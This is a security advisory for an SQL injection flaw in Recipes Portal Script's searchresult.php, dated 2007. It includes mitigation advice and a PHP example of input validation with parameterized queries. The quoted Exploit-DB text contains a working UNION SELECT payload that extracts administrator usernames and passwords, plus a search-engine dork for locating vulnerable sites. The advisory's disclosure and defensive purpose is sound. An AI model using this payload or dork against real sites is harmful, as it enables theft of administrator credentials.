Vendor: Recipes Portal Script
By: IRCRASH (Dr.Crash)
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Recipes Portal Script
Patch Exists: NO
2007

Recipes Portal Script SQL INJECTION

Recipes Portal Script is vulnerable to SQL injection through the 'sbcat_id' parameter of the 'searchresult.php' page. The SQL code provided in the exploit uses a UNION SELECT against the sbrecipe_admin table to retrieve sensitive information from the database, including the administrator's username and password.

Mitigation:

To mitigate this vulnerability, the developer should implement proper input validation and parameterized queries to prevent SQL injection attacks. Additionally, the affected software should be updated to a patched version.
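
As an added example (not code from Recipes Portal Script or from the advisory), this is one way the 'sbcat_id' lookup could apply both mitigations: strict integer validation followed by a bound parameter. The function name, the `recipes` table and its columns are assumptions, and SQLite in memory stands in for the real database so the example runs offline.

```php
<?php
declare(strict_types=1);

// Hypothetical replacement for the category lookup in searchresult.php.
// Only the parameter name sbcat_id comes from the advisory; the table
// and column names used here are assumptions.
function recipes_by_subcategory(PDO $pdo, string $raw): array
{
    // 1. Validate: sbcat_id must be a positive integer and nothing else.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('sbcat_id must be a positive integer');
    }

    // 2. Parameterize: the value is bound, never concatenated into the SQL text.
    $stmt = $pdo->prepare('SELECT id, title FROM recipes WHERE sbcat_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE recipes (id INTEGER PRIMARY KEY, sbcat_id INTEGER, title TEXT)');
$pdo->exec("INSERT INTO recipes (sbcat_id, title) VALUES (3, 'Lentil soup'), (4, 'Flatbread')");

// Constructed inputs: one valid id and one non-integer value of the kind
// the advisory describes being placed in sbcat_id.
foreach (['3', '999999 union select 0'] as $input) {
    try {
        $rows = recipes_by_subcategory($pdo, $input);
        printf("%-24s -> %d row(s)\n", $input, count($rows));
    } catch (InvalidArgumentException $e) {
        printf("%-24s -> rejected: %s\n", $input, $e->getMessage());
    }
}
```

Validation alone would stop this particular parameter, but binding is what keeps the query safe if the validation is later loosened or the same pattern is copied to a string parameter.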

Exploit-DB raw data:

################################IN THE NAME OF GOD###################################
####                    Recipes Portal Script SQL INJECTION                      ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#Script Download : http://www.softbizscripts.com/                                   #
#DORK: "Powered by SoftbizScripts" inurl:"searchresult.php?sbcat_id="               #
#                                                                                   #
#                                                                                   #
#                                                                                   #
#Injection Address : http://Site.com/searchresult.php?sbcat_id=[sql code]           #
#SQL CODE : 999999%20union/**/select/**/0,sbadmin_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,sbadmin_pwd,17,18,19,20,21,22/**/from/**/sbrecipe_admin/*
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################

# milw0rm.com [2007-10-13]